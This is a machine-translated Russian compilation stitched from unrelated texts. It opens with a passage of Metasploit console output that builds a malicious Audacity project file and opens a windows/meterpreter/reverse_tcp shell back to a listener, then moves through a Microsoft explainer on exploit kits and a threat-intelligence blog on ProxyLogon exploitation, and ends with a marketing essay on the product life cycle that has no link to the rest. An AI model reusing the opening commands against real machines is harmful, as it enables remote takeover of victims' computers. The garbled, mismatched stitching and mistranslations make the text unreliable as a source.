 LHOST 192.168.2.15 да Локальный адрес
 LPORT 4444 да Локальный порт
 
 
 Цель эксплойта:
 
 Идентификационное имя
 - ----
 0 Audacity Universal 1.2
 
 
 msf эксплойт (дерзость)> эксплойт
 
 [*] Привязка обработчика к LHOST 0.0.0.0
 [*] Запущен обратный обработчик
 [*] Создание файла auda_eviL.gro ...
 [*] Созданный выходной файл //usr/share/metasploit-framework/data/exploits/auda_eviL.gro
 [*] Эксплойт завершен, но сеанс не создан. 

И получите оболочку meterpreter!

 msf exploit (audacity)> использовать мульти / обработчик
msf exploit (обработчик)> установить PAYLOAD windows / meterpreter / reverse_tcp
PAYLOAD => окна / meterpreter / reverse_tcp
msf exploit (обработчик)> установить LHOST 192.168.2.15
LHOST => 192.168.2.15
эксплойт msf (обработчик)> эксплойт

[*] Привязка обработчика к LHOST 0.0.0.0
[*] Запущен обратный обработчик
[*] Запуск обработчика полезной нагрузки ...
[*] Этап отправки (718336 байт)
[*] Открыт сеанс Meterpreter 1 (192.168.2.15:4444 -> 192.168.2.109:1445)

  счетчик > 

Эксплойты и комплекты эксплойтов — Windows Security

  • 2 минуты на чтение

В этой статье

Эксплойты используют уязвимости в программном обеспечении.Уязвимость похожа на дыру в вашем программном обеспечении, которую вредоносное ПО может использовать для проникновения на ваше устройство. Вредоносное ПО использует эти уязвимости, чтобы обойти меры безопасности вашего компьютера и заразить ваше устройство.

Как работают эксплойты и наборы эксплойтов

Уязвимости часто являются первой частью более крупной атаки. Хакеры сканируют устаревшие системы, содержащие критические уязвимости, которые затем используют, развертывая целевое вредоносное ПО. Эксплойты часто включают шелл-код, который представляет собой небольшую полезную нагрузку вредоносного ПО, используемую для загрузки дополнительных вредоносных программ из сетей, контролируемых злоумышленником.Shellcode позволяет хакерам заражать устройства и проникать в организации.

Комплекты эксплойтов — это более полные инструменты, содержащие набор эксплойтов. Эти комплекты сканируют устройства на предмет различных уязвимостей программного обеспечения и, если таковые обнаруживаются, развертывают дополнительные вредоносные программы для дальнейшего заражения устройства. Наборы могут использовать эксплойты, нацеленные на различное программное обеспечение, включая Adobe Flash Player, Adobe Reader, Internet Explorer, Oracle Java и Sun Java.

Наиболее распространенный метод, используемый злоумышленниками для распространения эксплойтов и комплектов эксплойтов, — через веб-страницы, но эксплойты также могут поступать по электронной почте.Некоторые веб-сайты неосознанно и неохотно размещают в своей рекламе вредоносный код и эксплойты.

Инфографика ниже показывает, как набор эксплойтов может попытаться использовать устройство после посещения взломанной веб-страницы.

Рисунок 1. Пример работы с наборами

Несколько известных угроз, включая Wannacry, используют уязвимость блока сообщений сервера (SMB) CVE-2017-0144 для запуска вредоносного ПО.

Примеры эксплойт-китов:

Чтобы узнать больше об эксплойтах, прочитайте это сообщение в блоге о разборке двойного образца нулевого дня, обнаруженного в ходе совместной охоты с ESET.

Как мы называем эксплойты

Мы классифицируем эксплойты в нашей энциклопедии вредоносных программ по «платформе», на которую они нацелены. Например, Exploit: Java / CVE-2013-1489.A — это эксплойт, нацеленный на уязвимость в Java.

Проект под названием «Common Vulnerabilities and Exposures (CVE)» используется многими поставщиками программного обеспечения для обеспечения безопасности. В проекте каждой уязвимости присваивается уникальный номер, например, CVE-2016-0778. Часть «2016» относится к году обнаружения уязвимости. «0778» — это уникальный идентификатор данной уязвимости.

Вы можете узнать больше на сайте CVE.

Как защититься от эксплойтов

Лучшая защита от эксплойтов — это поддерживать программное обеспечение вашей организации в актуальном состоянии. Поставщики программного обеспечения предоставляют обновления для многих известных уязвимостей, поэтому убедитесь, что эти обновления применяются ко всем устройствам.

Дополнительные общие советы см. В разделе Предотвращение заражения вредоносным ПО.

Эксплойт в Microsoft Exchange Server: что произошло дальше

Возможно, сегодня день дурака, но обнаружение уязвимостей нулевого дня в серверах Microsoft Exchange — не шутка.Прошло четыре недели с тех пор, как Microsoft объявила, что злоумышленники используют четыре уязвимости нулевого дня, известные под общим названием «ProxyLogon». В то время мы писали в блоге, в котором MITER ATT & CK соотносился с эксплойтами Microsoft Exchange, но с тех пор многое произошло. В этом блоге мы рассказываем о том, что произошло дальше.

Для тех, кто избегал всех кибер-заголовков, вот краткое изложение того, что произошло. В начале марта Microsoft объявила, что четыре уязвимости нулевого дня в их серверах Exchange активно используются группой угроз, связанной с Китайской Народной Республикой (КНР), под названием HAFNIUM.Microsoft быстро выпустила исправления для этих уязвимостей, но предупредила своих клиентов, что они все еще могут быть уязвимы для атак, если ранее были нацелены. Кроме того, Microsoft выпустила сценарий, который позволил бы своим клиентам проверять индикаторы компрометации, приписываемые HAFNIUM, и предупредил, что атаки, вероятно, также будут исходить от различных групп угроз.

HAFNIUM не одинок в своих усилиях

Спустя неделю исследователи заметили, что «по крайней мере десять» групп повышенной постоянной угрозы (APT) использовали уязвимости ProxyLogon.Некоторые из этих злоумышленников имели доступ к эксплойтам до того, как Microsoft выпустила свое объявление и исправление. Согласно блогу Volexity, самое раннее обнаружение злоумышленников, использующих уязвимости ProxyLogon, было 3 января 2021 года. Microsoft была проинформирована об этих уязвимостях «известным исследователем уязвимостей» 5 января 2021 года. Неясно, какие действия Microsoft предприняла. с января по март, чтобы защитить своих клиентов от атак. Тем не менее, группы APT продолжали приходить к уязвимым серверам Exchange.

Исследователи безопасности наблюдали, как группа «Tick» использовала уязвимости ProxyLogon в конце февраля 2021 года, а группа под названием LuckyMouse использовала эксплойты за день до выпуска патча Microsoft. Многие из перечисленных исследователями APT-групп также имели связи с КНР, включая печально известную группу «Winnti» (иногда называемую зонтиком угроз Winnti). Было замечено, что Winnti использовала эксплойты всего за несколько часов до того, как Microsoft выпустила патч. Неудивительно, что после того, как Microsoft выпустила патч, еще больше злоумышленников обратили на это внимание, и началась массовая эксплуатация уязвимостей ProxyLogon.

Хронология атак Proxylogon

Двухмесячный перерыв между обнаружением и публичным уведомлением означает, что злоумышленники атаковали организации до того, как узнали, что они уязвимы. Учитывая, что ранние атаки проводились изощренными APT-группами, вполне вероятно, что эти атаки остались незамеченными. Это ясно демонстрирует необходимость в скрипте обнаружения Microsoft. Применение патча необходимо, но организациям, пострадавшим от уязвимостей ProxyLogon (по оценкам, до 60 000!), Необходимо исследовать свои сети.Сам по себе патч не спасет организации от злоумышленников, которые уже разбили лагерь в своих сетях.

Группы, использующие уязвимости ProxyLogon на раннем этапе, вероятно, были очень сложными и, следовательно, достаточно технически продвинутыми, чтобы удалить других злоумышленников из скомпрометированных сетей. Однако, когда возможен захват существующих веб-шеллов, техническая планка снижается. Реально возможно, что некоторые менее изощренные группы угроз захватили веб-оболочки, которые уже были на уязвимых серверах Exchange.В результате использование уязвимостей ProxyLogon становится доступным для гораздо большего числа злоумышленников всех технических уровней по всему миру.

Участники программы-вымогателя и криптомайнеры присоединились к эксплойту

Введите операторы вымогателей. Из предыдущих блогов мы знаем, что операторы программ-вымогателей гибки и быстро приспосабливаются к новым возможностям эксплуатации. Эксплуатация этих уязвимостей ничем не отличается, и операторы программ-вымогателей быстро использовали их в своих интересах.Операторы варианта вымогателя под названием DearCry использовали уязвимости ProxyLogon для компрометации сетей жертв. Microsoft признала существование DearCry и, как сообщается, блокирует развертывание программы-вымогателя DearCry через взломанные серверы Exchange.

Не будем забывать, что операторы программ-вымогателей «Черное королевство» вскоре начали использовать эти эксплойты и успешно получили доступ примерно к 1500 уязвимым серверам Exchange. Ранее отмечалось, что программа-вымогатель Black Kingdom нацелена на уязвимости Pulse VPN для доступа к организациям и шифрования их сетей.Исследователи также сообщили, что операторы вымогателя REvil (также известного как Sodinokibi) использовали уязвимости ProxyLogon для нацеливания на Acer в марте 2021 года, когда они потребовали рекордный выкуп в размере 50 миллионов долларов. Использование REvil ProxyLogon на момент написания не подтверждено. Поскольку эксплуатация уязвимостей является популярным методом начального доступа, вполне вероятно, что многие другие операторы программ-вымогателей также будут использовать недостатки ProxyLogon. В конце концов, им нравится копировать друг друга.

Примерно в то же время, когда DearCry эксплуатировал ProxyLogon, другие злоумышленники использовали уязвимости для развертывания майнеров криптовалюты.Исследователи обнаружили атаки с использованием веб-шеллов, развернутых на скомпрометированных серверах для загрузки вредоносных полезных нагрузок, связанных с ботнетом LemonDuck. LemonDuck наиболее известен установкой XMRig, которая добывает криптовалюту для владельцев ботнетов. Уязвимости ProxyLogon — от APT-групп до ботнетов для майнинга криптовалют — представляют собой привлекательную перспективу для всех киберпреступников.

Учитывая все, что мы сейчас знаем, до сих пор неясно, как первоначальные злоумышленники обнаружили эксплойты. Также неясно, как они впоследствии были распространены среди других групп угроз.Мы обнаружили, что пользователь китайской торговой площадки Tea Horse Road рекламирует предложение, связанное с уязвимостями в серверах Microsoft Exchange, включая «прямое RCE (удаленное выполнение кода) для получения системных разрешений». Листинг предполагал, что пользователь продал предложение 1000 раз, при этом одна единица обошлась покупателю в 8000 долларов! Хотя, когда мы захватили пост, не было похоже, что он был продан.

Реклама в почте Tea Horse Road Уязвимости сервера Exchange

Этот пост демонстрирует, что вполне вероятно, что киберпреступники обменивались подробностями об этих эксплойтах на форумах, в публичных досках сообщений или в личных сообщениях.Кроме того, всего через три дня после объявления Microsoft на форумах киберпреступников началась болтовня об этих нулевых днях. Пользователь одного форума киберпреступников спросил, работает ли кто-нибудь над эксплойтами или использует их, а также разместил ссылки на публичные сообщения по проблеме. Других пользователей интересовало, доступно ли доказательство концепции (PoC) для этих эксплойтов.

Было загружено и удалено

PoC

И злоумышленникам не пришлось долго ждать этих PoC! PoC — это код, разработанный для демонстрации недостатков безопасности в программном обеспечении или сетях с целью выявления уязвимостей и их исправления.Они регулярно используются защитниками сети, но часто используются киберпреступниками.

В середине марта было выпущено два PoC для уязвимостей ProxyLogon. Первый был опубликован на GitHub, но для правильной работы потребовались некоторые исправления. Тем не менее, он предоставил достаточно информации для разработки функционального эксплойта RCE для уязвимых серверов Exchange. PoC был отключен GitHub для защиты устройств. Это вызвало некоторое беспокойство среди специалистов по безопасности, поскольку его удаление означало, что они не могли использовать его для законных целей повышения безопасности сети.Второй опубликованный PoC работал с небольшими изменениями. Исследователь, который его тестировал, предупредил, что менее технически изощренные злоумышленники смогут его выполнить.

По сообщениям, 12 марта 2021 года Microsoft провела расследование о том, была ли информация, необходимая для проведения атак ProxyLogon, была получена путем публичного раскрытия информации, сделанного компанией своим партнерам по безопасности. Перед публичным раскрытием уязвимостей ProxyLogon Microsoft выпустила коды PoC-атак для антивирусных и других фирм, занимающихся кибербезопасностью.Эксплойты PoC, обнаруженные в недавних атаках, напоминают эксплойты, предоставленные Microsoft, что заставляет организацию расследовать, была ли утечка информации о PoC намеренно или случайно.

Microsoft выпустила средство устранения рисков в один клик

В очередной попытке защитить всех своих клиентов 15 марта 2021 года Microsoft выпустила инструмент защиты Microsoft Exchange, позволяющий одним щелчком мыши. Этот инструмент представляет собой «простое в использовании» автоматическое решение, которое означает, что организации, не имеющие специальных групп безопасности, могут защитить себя от атак ProxyLogon. .Конечно, это временное решение; организациям по-прежнему следует применять исправления и отслеживать вредоносную активность в своих сетях.

В конце марта Microsoft объявила, что 92% уязвимых серверов обмена Microsoft теперь исправлены. Звучит как отличная новость, не правда ли? Но это немного похоже на ложную экономию. Эта статистика появилась после нескольких недель сообщений о том, что злоумышленники активно используют эти уязвимости. Возможно, ущерб уже нанесен.Неизвестно, сколько организаций пострадали от эксплойтов ProxyLogon. Тем не менее, в ближайшие месяцы к этой цифре, несомненно, прибавится еще больше.

Очень важно быть в курсе последних уязвимостей и обновлений безопасности, связанных с этим широко известным эксплойтом. По мере появления новых подробностей Digital Shadows будет продолжать обновлять этот пост дополнительным анализом и рекомендациями в дополнение к предоставлению обновленной информации нашим клиентам. Наличие внутренней или внешней команды по анализу киберугроз (CTI) может быстро выявлять тенденции и списки, имеющие отношение к вашей организации.Эта практика может помочь группам безопасности определить приоритетность наиболее уязвимых областей, тем самым обеспечивая более надежную защиту.

Если вы хотите получить четкое представление о поверхности атаки, SearchLight собирает данные из миллиардов источников в открытой, глубокой и темной сети, давая вам представление о вашей уязвимости в режиме реального времени. В отличие от других поставщиков аналитики угроз, Digital Shadows фокусируется на высокоприоритетных, действенных предупреждениях, связанных с подлинными угрозами для бизнеса. Получите 7-дневную пробную версию SearchLight здесь .

Для существующих клиентов Digital Shadows рекомендует следующие запросы Shadow Search для получения обновлений о развитии этого события:

  • (тип = [сообщения в блоге] ИЛИ тип = [обновления разведданных] ИЛИ тип = [каналы индикаторов] ИЛИ тип = [Уязвимости и эксплойты]) И («CVE-2021-26855» ИЛИ «CVE-2021-26857» ИЛИ «CVE-2021-26858» ИЛИ «CVE-2021-27065»)
  • (тип = [сообщения в блоге] ИЛИ тип = [обновления разведданных] ИЛИ тип = [каналы индикаторов] ИЛИ тип = [Уязвимости и эксплойты]) И ( «Hafnium» ИЛИ «Серверы Microsoft Exchange») И date = [now-14d TO now]
  • (type = [forum messages]) AND («CVE-2021-26855» OR «CVE-2021-26857» OR «CVE -2021-26858 »ИЛИ« CVE-2021-27065 »)
  • (тип = [сообщения на форуме]) И (« Hafnium »ИЛИ« Серверы Microsoft Exchange ») И дата = [сейчас-14 дней до настоящего момента]

Следующие методы MITER ATT & CK охватывают эксплуатацию уязвимостей ProxyLogon:

ID Имя
T1595 Активное сканирование
T1587.004 Возможности разработки: эксплойты
T1190 Эксплуатация общедоступного приложения
T1203 Эксплуатация для клиентского исполнения
T1078 Действительные учетные записи
T1072 Инструменты развертывания программного обеспечения
T1505.003 Компонент серверного программного обеспечения: Web Shell
T1041 Эксфильтрация по каналу C2
T1114.001 Сбор электронной почты: Сбор локальной электронной почты
T1005 Данные из локальной системы
T1083 Обнаружение файлов и каталогов

Используйте жизненный цикл продукта

Наиболее внимательные и вдумчивые руководители высшего звена по маркетингу уже знакомы с концепцией жизненного цикла продукта. Даже горстка уникально космополитичных и современных президентов корпораций ознакомилась с этой дразнящей концепцией.Тем не менее, недавний опрос, который я провел среди таких руководителей, не нашел никого, кто использовал бы эту концепцию каким-либо стратегическим образом, и очень мало кто использовал ее каким-либо тактическим способом. Он остался — как и многие увлекательные теории в экономике, физике и сексе — на удивление прочным, но почти полностью безработным и, казалось бы, неработоспособным предметом профессионального багажа, присутствие которого в риторике профессиональных дискуссий добавляет желанной, но явно недостижимой легитимности к идея, что управление маркетингом — это как-то профессия.Более того, существует стойкое ощущение, что концепция жизненного цикла добавляет блеска и правдоподобия настойчивому утверждению в определенных кругах о том, что маркетинг близок к какой-то науке. 1

Концепция жизненного цикла продукта сегодня находится примерно на той стадии, на которой было представление Коперника о Вселенной 300 лет назад: многие люди знали об этом, но вряд ли кто-то, казалось, использовал его каким-либо эффективным или продуктивным способом.

Теперь, когда так много людей знают и в некоторой степени понимают жизненный цикл продукта, кажется, пора заставить его работать.Цель данной статьи — предложить некоторые способы эффективного использования концепции и превращения знания о ее существовании в управленческий инструмент конкурентной силы.

Поскольку концепция была представлена ​​разными авторами и для разной аудитории по-разному, полезно кратко рассмотреть ее здесь, чтобы у каждого читателя был одинаковый фон для обсуждения, которое последует далее в этой статье.

Исторический образец

История жизни большинства успешных продуктов — это история их прохождения через определенные узнаваемые этапы.Они показаны в Приложении I и расположены в следующем порядке:

Приложение I Жизненный цикл продукта — вся отрасль

Этап 1. Развитие рынка

Это когда новый продукт впервые выводится на рынок до того, как на него появится доказанный спрос, и часто до того, как он будет полностью технически испытан во всех отношениях. Продажи низкие и медленно растут.

Этап 2. Рост рынка

Спрос начинает расти, и размер всего рынка быстро увеличивается.Его также можно назвать «этапом взлета».

Этап 3. Зрелость рынка

Спрос выравнивается и растет, по большей части, только со скоростью замещения и создания новой семьи.

Этап 4. Падение рынка

Продукт начинает терять привлекательность для потребителей, а продажи падают, например, когда с появлением автомобилей проиграли кнуты-багги, а шелк уступил место нейлону.

Руководителю службы безопасности сразу же зададут три рабочих вопроса:

  • Учитывая предлагаемый новый продукт или услугу, как и в какой степени можно предсказать форму и продолжительность каждого этапа?
  • Учитывая существующий продукт, как определить, на какой стадии он находится?
  • Учитывая все эти знания, как их можно эффективно использовать?

Краткое дальнейшее описание каждого этапа будет полезно перед тем, как подробно разбираться с этими вопросами.

Стадия разработки

Вывод нового продукта на рынок сопряжен с неизвестностью, неопределенностями и часто неизвестными рисками. Как правило, спрос должен быть «создан» на начальной стадии рыночного развития продукта . Сколько времени это займет, зависит от сложности продукта, степени его новизны, соответствия потребностям потребителей и наличия конкурентоспособных заменителей той или иной формы. Доказанное лекарство от рака практически не потребует развития рынка; он получит немедленную массовую поддержку.Предполагаемый превосходный заменитель процесса литья скульптур по выплавляемым моделям потребовал бы намного больше времени.

Раз за разом доказывалось, что разработка новых продуктов, должным образом ориентированная на клиента, является одним из основных условий роста продаж и прибыли, еще более убедительно были продемонстрированы огромные затраты и частые смертельные случаи, связанные с запуском новых продуктов. Кажется, что ничто не требует больше времени, денег, подводных камней, причиняет больше страданий или разрушает карьеру, чем искренние и хорошо продуманные программы создания новых продуктов.Дело в том, что большинство новых продуктов вообще не имеют классической кривой жизненного цикла. Вместо этого у них с самого начала есть бесконечно нисходящая кривая. Продукт не только не отрывается от земли; он быстро уходит под землю — на шесть футов под землей.

Поэтому неудивительно, что некоторые разочарованные и сильно пострадавшие компании недавно приняли более консервативную политику — то, что я называю «политикой использованных яблок». Вместо того, чтобы стремиться быть первой компанией, которая увидит и использует возможность, они систематически избегают быть первыми.Они позволяют другим откусить первый кусочек якобы сочного яблока, которое их соблазняет. Они позволяют другим быть первопроходцами. Если идея сработает, они быстро последуют ее примеру. По сути, они говорят: «Проблема пионера в том, что пионеры погибают от рук индейцев». Следовательно, они говорят (тщательно смешивая свои метафоры): «Нам не нужно откусить первый кусок яблока. Второй достаточно хорош ». Они готовы съесть использованное яблоко, но они стараются быть достаточно бдительными, чтобы убедиться, что оно использовалось лишь немного — чтобы они, по крайней мере, получили второй большой укус, а не десятый кусочек.

Стадия роста

Обычной характеристикой успешного нового продукта является постепенный рост кривой продаж на этапе развития рынка. В какой-то момент этого роста происходит заметное увеличение потребительского спроса и рост продаж. Бум идет. Это начало этапа 2 — этапа роста рынка . В этот момент в бой вступают потенциальные конкуренты, которые наблюдали за развитием событий на первом этапе. Первыми, как правило, попадают те, у кого есть исключительно эффективная политика «бывших в употреблении яблок».Некоторые выходят на рынок с копиями продукта оригинала. Остальные вносят функциональные и дизайнерские улучшения. И в этот момент начинают развиваться дифференциация продуктов и брендов.

Последовавшая за этим борьба за покровительство потребителя ставит перед первоначальным производителем совершенно новый набор проблем. Вместо того чтобы искать способы побудить потребителей попробовать продукт, создатель теперь сталкивается с более серьезной проблемой — заставить их предпочесть его бренд .Обычно это требует важных изменений в маркетинговых стратегиях и методах. Но применяемые сейчас политика и тактика не будут ни свободным выбором производителя-новичка, ни столь экспериментальными, какими они могли бы быть на этапе I. Присутствие конкурентов как диктует, так и ограничивает то, что можно легко попробовать — например, , проверяя, какой уровень цен является лучшим или лучший канал распространения.

По мере того, как скорость принятия потребителями ускоряется, становится все проще открывать новые каналы сбыта и торговые точки.Последующее заполнение распределительных трубопроводов обычно приводит к тому, что промышленные продажи всей отрасли растут быстрее, чем продажи в магазинах. Это создает преувеличенное впечатление о возможности получения прибыли, что, в свою очередь, привлекает больше конкурентов. Некоторые из них начнут устанавливать более низкие цены из-за более поздних достижений в области технологий, сокращения производства, необходимости получать более низкую маржу, чтобы получить распространение, и тому подобное. Все это со временем неизбежно переводит отрасль на порог нового этапа конкуренции.

Стадия погашения

Этот новый этап — это этап рыночной зрелости . Первый признак его появления — свидетельство насыщения рынка. Это означает, что большинство компаний-потребителей или домохозяйств, которые являются потенциальными покупателями, будут владеть продуктом или использовать его. Сейчас продажи растут примерно наравне с населением. Больше наполнять распределительные трубопроводы не нужно. Ценовая конкуренция сейчас обостряется. Конкурентные попытки добиться и удержать предпочтение бренда теперь включают в себя все более тонкую дифференциацию продукта, обслуживания клиентов, а также методов продвижения и требований, предъявляемых к продукту.

Как правило, стадия зрелости рынка вынуждает производителя сосредоточиться на удержании своих торговых точек, сохранении своего места на полках и, в конце концов, на попытках обеспечить еще более интенсивное распространение. В то время как на этапе развития рынка создатель в значительной степени зависел от позитивных усилий своих розничных торговцев и дистрибьюторов, направленных на оказание помощи в продаже его продукта, розничные торговцы и дистрибьюторы теперь часто в основном сводились к тому, чтобы быть продавцами товаров и принимать заказы.В частности, что касается брендовых продуктов, создатель теперь, как никогда ранее, должен напрямую общаться с потребителем.

Стадия зрелости рынка обычно требует нового акцента на более эффективную конкуренцию. Производитель все чаще вынужден апеллировать к потребителю на основании цены, предельных различий в продуктах или того и другого. В зависимости от продукта услуги и предложения, предлагаемые в связи с ним, часто являются наиболее четкими и эффективными формами дифференциации.Помимо этого, будут предприниматься попытки создать и продвигать прекрасные отличительные черты продукта с помощью упаковки и рекламы, а также привлечь внимание к особым сегментам рынка. Этап рыночной зрелости может быть пройден быстро, как в случае с большинством модных женских мод, или он может сохраняться в течение нескольких поколений, при этом потребление на душу населения не растет и не падает, как в случае таких основных товаров, как мужская обувь и промышленные застежки. Или зрелость может сохраняться, но в состоянии постепенного, но неуклонного снижения на душу населения, как в случае пива и стали.

Стадия упадка

Когда рыночная зрелость сокращается и, следовательно, подходит к концу, продукт переходит на стадию 4 — спад рынка . Во всех случаях зрелости и упадка отрасль трансформируется. Немногие компании способны выдержать конкурентный шторм. По мере снижения спроса избыточные мощности, которые уже были очевидны в период зрелости, теперь становятся повсеместными. Некоторые продюсеры неумолимо видят почерк на стене, но чувствуют, что при правильном управлении и хитрости они останутся одними из тех, кто выживет после всемирного потопа, который они так ясно предвидели.Чтобы напрямую ускорить затмение своих конкурентов или запугать их досрочным добровольным уходом из отрасли, они применяют различные агрессивно-депрессивные тактики, предлагают слияния или выкупы и обычно участвуют в деятельности, которая делает жизнь неблагодарно обременительной для всех фирм. и сделать смерть неизбежным последствием для большинства из них. Некоторые компании действительно переживают шторм, поддерживая жизнь за счет постоянного спада, который теперь четко характеризует отрасль. Производство концентрируется в руках меньшего числа людей.Цены и маржа падают. Потребителям становится скучно. Единственные случаи, когда есть какое-либо облегчение от этой скуки и постепенной эвтаназии, — это когда стиль и мода играют некоторую постоянно возрождающую роль.

Важность предварительного планирования

Зная, что жизнь успешных продуктов и услуг обычно характеризуется чем-то вроде модели, показанной в Приложении I, может стать основой для важных жизненно важных политик и практик. Одна из важнейших ценностей концепции жизненного цикла — для менеджеров, готовящихся запустить новый продукт.Первый шаг для них — попытаться предугадать профиль цикла предлагаемого продукта.

Как и во многих других делах в бизнесе и, возможно, только в маркетинге, практически невозможно дать универсальные полезные советы относительно того, как управлять своими делами. Безусловно, особенно сложно дать полезные советы о том, как предвидеть или прогнозировать наклон и продолжительность жизни продукта. В самом деле, именно потому, что так мало конкретных повседневных указаний возможно в чем-либо, и поскольку ни один контрольный список никогда сам по себе не был очень полезным для кого-либо в течение длительного времени, управление бизнесом, вероятно, никогда не станет наукой — всегда искусством. — и будет выплачивать исключительные награды менеджерам с редким талантом, огромной энергией, железным чутьем, большой способностью брать на себя ответственность и нести подотчетность.

Но это не означает, что нельзя или не следует прилагать полезных усилий, чтобы попытаться предвидеть наклон и продолжительность жизни нового продукта. Время, потраченное на попытки такого рода предвидения, не только помогает обеспечить более рациональный подход к планированию продуктов и мерчандайзингу; кроме того, как будет показано ниже, это может помочь сэкономить время для важных стратегических и тактических шагов после того, как продукт будет выведен на рынок. В частности, это может быть большим подспорьем в разработке упорядоченной серии конкурентных шагов, в расширении или продлении срока службы продукта, в поддержании чистой линейки продуктов и в намеренном отказе от умирающих и дорогостоящих старых продуктов. 2

Возможности отказа…

Как указывалось выше, продолжительность и наклон стадии развития рынка зависят от сложности продукта, степени его новизны, соответствия потребностям клиентов и наличия конкурентоспособных заменителей.

Чем более уникальна или отличительна новизна продукта, тем больше времени требуется для его успешного запуска. Мир не прокладывает путь к человеку с лучшей мышеловкой автоматически. 3 Миру нужно рассказывать, нянчить, соблазнять, заводить романтические отношения и даже подкупать (как, например, с купонами, образцами, бесплатными вспомогательными средствами и т. Д.). Когда новизна продукта уникальна, а работа, для которой он предназначен, уникальна, публика, как правило, не так быстро воспринимает его как нечто, в чем она явно нуждается или хочет.

Это делает жизнь новатора особенно сложной. У него будут больше, чем обычно, трудности с определением тех характеристик своего продукта и тех, которые поддерживают темы или устройства коммуникации, которые представляют ценность для потребителя.Как следствие, чем более характерна новизна, тем выше риск неудачи в результате либо недостаточности оборотного капитала для поддержания длительного и разочаровывающего периода создания достаточного количества платежеспособных клиентов, чтобы предложение окупилось, либо невозможности убедить инвесторов и банкиров в том, что они должны вложить больше денег.

В любой конкретной ситуации, чем больше людей будет задействовано в принятии единого решения о покупке нового продукта, тем более затяжной будет этап I.Так, например, в сильно фрагментированной отрасли строительных материалов для закрепления успеха требуется исключительно много времени; и, однажды схватившись за нее, она имеет тенденцию крепко держаться в течение долгого времени — часто слишком долго. С другой стороны, модные вещи явно становятся самыми быстрыми и самыми короткими. Но поскольку мода настолько сильна, в последнее время некоторые компании в отраслях, которые часто кажутся наименее подверженными моде (например, станки), сократили этап развития рынка, внедрив в свою продукцию элементы дизайна и упаковки.

Какие факторы продлевают стадию развития рынка и, следовательно, повышают риск неудачи? Чем сложнее продукт, чем более характерна его новизна, тем меньше влияние моды, тем большее количество людей влияет на одно решение о покупке, тем дороже и тем сильнее требуется изменение привычного образа действий покупателя. являются условиями, которые, скорее всего, замедлят работу и создадут проблемы.

… vs. Шансы на успех

Но проблемы также создают возможности контролировать силы, направленные против успеха нового продукта.Например, чем новее продукт, тем важнее для клиентов получить положительный первый опыт работы с ним. Новизна создает определенную особую заметность для продукта, когда определенное количество людей стоит в стороне, чтобы увидеть, как первые клиенты справляются с этим. Если их первый опыт окажется неблагоприятным в каком-то решающем смысле, это может иметь последствия, далеко непропорциональные действительной степени невыполнения ожиданий клиентов. Но благоприятный первый опыт или приложение по той же причине получит много непропорционально благоприятной огласки.

Возможность преувеличенного разочарования из-за плохого первого опыта может вызвать жизненно важные вопросы относительно соответствующих каналов распространения нового продукта. С одной стороны, для успешного запуска продукта может потребоваться наличие — как, например, в случае первых домашних стиральных машин — множества розничных продавцов, которые могут оказать потребителям значительную помощь в правильном использовании продукта и, таким образом, помочь обеспечить благоприятные условия для первых. опыт для тех покупателей. С другой стороны, каналы, которые предоставляют такую ​​помощь (например, небольшие магазины бытовой техники в случае стиральных машин) на этапе развития рынка, могут оказаться не самыми лучшими, способными наиболее успешно продавать продукт позже, когда помогают в создании и лично заверить клиентов менее важно, чем широкое распространение продукции.В той степени, в которой решения о каналах на этом первом этапе приносят в жертву некоторые требования этапа развития рынка некоторым требованиям более поздних этапов, скорость принятия продукта потребителями на начальном этапе может замедлиться.

При выходе на стадию развития рынка производителю часто бывает особенно трудно принять решение о ценообразовании. Если он установит изначально высокую цену, чтобы быстро окупить свои вложения, то есть «снять сливки», — или если он установит низкую цену, чтобы препятствовать потенциальной конкуренции, — i.е., «исключение»? Ответ зависит от оценки новатором вероятной продолжительности жизненного цикла продукта, степени патентной защиты, которой, вероятно, будет пользоваться продукт, суммы капитала, необходимого для создания продукта, эластичности спроса на начальном этапе его существования. продукта и многие другие факторы. Окончательное решение может повлиять не только на скорость, с которой продукт завоевывает популярность вначале, но даже на продолжительность его общего срока службы. Таким образом, некоторые товары, которые изначально были слишком низкими (особенно модные товары, такие как сорочка или мешок несколько лет назад), могут так быстро завоевать популярность, что станут недолговечными модными тенденциями.Более низкая скорость принятия потребителями часто может продлить их жизненные циклы и увеличить общую прибыль, которую они приносят.

Фактический наклон или скорость стадии роста зависит от некоторых из тех же факторов, что и успех или неудача на Стадии I. Но степень, в которой исключительность патента может играть решающую роль, иногда необъяснимо забывается. Чаще, чем можно было бы предположить, держатели сильных патентных позиций не осознают ни преимущества рыночного развития, когда их патенты становятся доступными для конкурентов, ни разрушающие рынок возможности неспособности более эффективно контролировать использование таких продуктов их конкурентами.

Вообще говоря, чем больше производителей нового продукта, тем больше усилий уходит на развитие рынка для него. Чистым результатом, скорее всего, будет более быстрый и резкий рост всего рынка. Доля рынка оригинатора может упасть, но его общие продажи и прибыль могут расти быстрее. Конечно, это имело место в последние годы в отношении цветного телевидения; Стремление RCA сделать свои трубки доступными для конкурентов отражает признание им власти числа над властью монополии.

С другой стороны, неспособность установить и обеспечить соблюдение соответствующих стандартов качества на заре создания стаканов и стаканов из полистирола и полиэтилена привело к появлению таких некачественных и некачественных товаров, что потребовались годы, чтобы вернуть доверие потребителей и возродить модель роста.

Но пытаться заранее предвидеть, какой может быть модель роста продукта, не очень полезно, если не удается провести различие между отраслевой структурой и структурой отдельной фирмы — для ее конкретного бренда.Отраслевой цикл почти наверняка будет отличаться от цикла отдельных фирм. Более того, жизненный цикл одного продукта может быть различным для разных компаний в одной и той же отрасли в один и тот же момент времени, и, безусловно, по-разному влияет на разные компании в одной и той же отрасли.

Бремя отправителя

Компания, ставящая на карту больше всего, — это оригинальный производитель — компания, которая выпускает совершенно новый продукт. Эта компания обычно несет большую часть затрат, невзгод и, конечно, рисков, связанных с разработкой как продукта, так и рынка.

Конкурентное давление

Как только новатор демонстрирует на этапе развития рынка, что существует устойчивый спрос, армии имитаторов устремляются к нему, чтобы извлечь выгоду и помочь создать бум, который становится этапом роста или взлета рынка. В результате, хотя сейчас общий спрос на продукт будет характеризовать исключительно быстрый рост, для компании-источника его этап роста парадоксальным образом теперь сокращается. Он должен разделить бум с новыми конкурентами. Следовательно, потенциальная скорость ускорения собственного взлета снижается и, действительно, может фактически не длиться так долго, как отрасль.Это происходит не только из-за большого количества конкурентов, но, как мы отмечали ранее, также из-за того, что конкуренты часто приходят с улучшением продукта и снижением цен. Хотя эти разработки, как правило, способствуют расширению рынка, они значительно ограничивают темпы роста компании-учредителя и продолжительность ее стадии взлета.

